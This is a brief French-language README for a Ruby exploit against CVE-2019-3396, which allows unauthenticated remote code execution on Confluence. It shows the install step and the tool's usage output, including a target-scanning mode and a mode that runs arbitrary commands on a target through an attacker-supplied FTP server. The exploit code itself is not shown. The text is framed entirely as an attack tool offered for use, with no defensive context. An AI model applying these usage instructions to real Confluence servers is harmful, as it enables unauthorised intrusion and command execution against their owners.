
Exploit Ruby pour CVE-2019-3396 permettant l'exécution de code à distance non authentifiée sur Confluence, incluant le scan de cibles et l'exécution de commandes via un serveur FTP.

bundle install
┌──(user㉿hostname)-[~/path/to/cve-2019-3396]
└─$ ruby cve-2019-3396.rb
Exploitation -> CVE-2019-3396
Auteur -> Abdallah Mohamed Elsharif
Remerciements à Ghost5egy et Hamza Abdulrahman et Omar et Alaa
Utilisation :
ruby cve-2019-3396.rb [options] Ou --help
ruby cve-2019-3396.rb -t CIBLE --scan
ruby cve-2019-3396.rb -t CIBLE --ftp-serv HOSTFTP -c COMMANDE